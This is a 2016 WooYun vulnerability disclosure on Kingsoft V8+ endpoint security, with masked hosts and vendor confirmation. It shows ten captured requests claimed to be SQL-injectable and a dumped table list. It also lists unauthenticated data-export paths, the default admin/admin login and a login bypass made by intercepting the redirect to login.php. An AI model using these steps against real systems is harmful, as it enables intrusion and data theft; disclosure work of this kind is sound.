当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0179804

漏洞标题:金山V8+终端安全系统10处SQL注入(需登录)+默认配置不当+后台权限绕过等漏洞集合

相关厂商:金山网络

漏洞作者: niliu

提交时间:2016-03-01 18:54

修复时间:2016-05-30 20:10

公开时间:2016-05-30 20:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-01: 细节已通知厂商并且等待厂商处理中
2016-03-01: 厂商已经确认,细节仅向厂商公开
2016-03-04: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-04-25: 细节向核心白帽子及相关领域专家公开
2016-05-05: 细节向普通白帽子公开
2016-05-15: 细节向实习白帽子公开
2016-05-30: 细节向公众公开

简要描述:

金山V8+终端安全系统10处SQL注入+默认配置不当+后台权限绕过

详细说明:

看下产品介绍先

1.jpg


SQL注入比较多,10处如下:

1.
POST /active_defense/scan/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/active_defense/scan/main.php?li=4&a=7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}
2.
POST /report/log/get_log_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 408
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"20","log_request_page":"2","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}
3.
POST /report/report/ajax.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 205
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/report/main.php?li=5&a=14
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
{"get_report_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","period_type":"-1","count_page":"2","request_page":"1","VHierarchyID":"ADMIN"}}
4.
POST /report/log/get_log_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 409
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"100","log_request_page":"1","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}
5.
POST /softmanagement/distribute/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/distribute/main.php?li=3&a=6
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}
6.
POST /boundary_manage/ajax.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 372
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%221%22%2C%22stype%22%3A%221%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A1%7D
Referer: **.**.**.**:6868/boundary_manage/boundary_file.php?li=2&a=2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
{"get_file_name_details_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","groupids":["1"],"boundary_type":"5","time_type":"4","start_time":"0","end_time":"0","file_md5":"72C84AE241A44567B31CA2B4FB7557C9","sort_type":"download_time","sort_order":"desc","page_count":"10","current_page":"1"}}
7.
POST /client_manage/group/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%226%22%2C%22rtype%22%3A%225%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A2%7D; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/client_manage/group/main.php?li=1&a=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}
8.
POST /settings/system/get_group_list_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/settings/system/groups.php?li=6&a=15
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}
9.
POST /softmanagement/forbidden/get_group_list_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}
10.
POST /softmanagement/forbidden/get_classify_list_info_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 288
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
{"get_classify_list_info_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","classify_id":"-1","group_id":"ADMIN","key_words":"3","count_page":"20","current_page":"1","sort_type":"state","sort_order":"desc"}}

漏洞证明:

555.jpg


777.jpg


666.jpg


787.jpg


665.jpg


445.jpg


234.jpg


545.jpg


887.jpg


999.jpg


100.jpg


Database: SQLite_masterdb
[69 tables]
+-----------------------------+
| ArpClientMacIp              |
| ArpInfo                     |
| ArpInfo_History             |
| ArpOptions                  |
| BDLogManagerOptions         |
| BoundaryOptions             |
| ClientDelete                |
| ClientInfoCollect           |
| ClientScanFinishInfo        |
| ClientStaInfo               |
| ClientUpdateOptions         |
| ClientVersionInfo           |
| ClientVirusCollect          |
| DefaultPopedom              |
| DomainGroupInfo             |
| GroupInfo                   |
| HostInfo                    |
| HostSoftLeakScanInfo        |
| HostSysLeakScanInfo         |
| IPFilter                    |
| KChildSysCenterIPInfo       |
| KClearOpenOptions           |
| KFilePushInfo               |
| KForbidSoftInfo             |
| KGroupIP                    |
| KLncncCompanyInfo           |
| KReport                     |
| KSimpleSoftInfo             |
| KSoftUninstallStrategy      |
| KSoftWareMgrOptions         |
| KUninstallSoftInfo          |
| KVDeviceGroupIP             |
| KVDeviceGroupInfo           |
| KVDipatcherPlanTask         |
| KVMEngineOptions            |
| LeakRepairStategy           |
| LeakScanRepairCmd           |
| MailMonOptions              |
| MailMonVirusInfo            |
| NetWorkManagerInfo          |
| ReportIndex                 |
| ReportOnlineIPSet           |
| ReportStrategy              |
| RootWhiteListInfo           |
| SCMessageLog                |
| SCOperLog                   |
| SCOperation                 |
| SCUser                      |
| ScanConfigOptions           |
| ScanOptions                 |
| StrongManagerOptions        |
| SysMonitorOpt               |
| SystemCenterTree            |
| TaskOptions                 |
| UDiskAgentOptions           |
| UDiskOptions                |
| USBOptions                  |
| UninstallKavClientIPs       |
| UserPopedom                 |
| VHierarchyBaseVirusDealInfo |
| VHierarchyInfo              |
| VHierarchySetupInfo         |
| VirusCountInfo              |
| VirusInfo                   |
| ViuusInfoCollect            |
| WatchOptions                |
| _GroupInfo_old_20131010     |
| sqlite_sequence             |
| webconfig                   |
+-----------------------------+


默认配置不当,系统默认开启了目录遍历
举几个例子

http://**.**.**.**/boundary_manage/
**.**.**.**:6868/active_defense/
**.**.**.**:6868/report/
http://**.**.**.**/active_defense/
**.**.**.**:6868/settings/


还有很多不列举了,找了几个案例证明下

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


然后发现许多页面都可以未授权访问,由于页面比较多没有一一尝试,厂商统一限制下吧,文件名中有excel字样的都是直接下载对应的数据的。
列举几处

**.**.**.**:6868/active_defense/scan/task.php
**.**.**.**:6868/active_defense/scan/export.php
**.**.**.**:6868/report/log/excel2.php
**.**.**.**:6868/report/log/analyse.php
**.**.**.**:6868/report/log/date_select.php
**.**.**.**:6868/report/log/excel.php
**.**.**.**:6868/report/general/ksafecount.php
http://**.**.**.**/active_defense/scan/task.php
http://**.**.**.**/boundary_manage/boundary_file_report.php
http://**.**.**.**/active_defense/scan/task.php


7.jpg


8.jpg


9.jpg

10.jpg


顺便提一下后台存在默认口令admin/admin

111.jpg


222.jpg


以上的未授权访问发现看到的数据比较有限,于是又测试了一番,发现后台完全可以绕过。。。
系统的所有页面访问时会判断是否登录,请求如下:

GET /login.php HTTP/1.1
Host: **.**.**.**:6868
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: **.**.**.**:6868/settings/system/groups.php?li=0&a=0
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8


这个请求会跳转到登录页,那么只要在fiddler中,输入拦截该url即可绕过。

z11.jpg


可以查看系统配置,密码,还可以修改公告并且公告处存在XSS,上传热门工具。。
看下效果

z1.jpg


z2.jpg


z3.jpg


z4.jpg


z5.jpg


z6.jpg


z7.jpg


z8.jpg


z9.jpg


z10.jpg


修复方案:

过滤+权限

版权声明:转载请注明来源 niliu@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-03-01 20:06

厂商回复:

感谢对金山安全关注,已反馈给业务跟进修复,谢谢提交

最新状态:

暂无

漏洞评价:

评价

  1. 2016-03-01 21:05 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1892 漏洞数:302 | 最近有人冒充该账号行骗,任何自称HackBrai...)

    前排膜拜niliu大师傅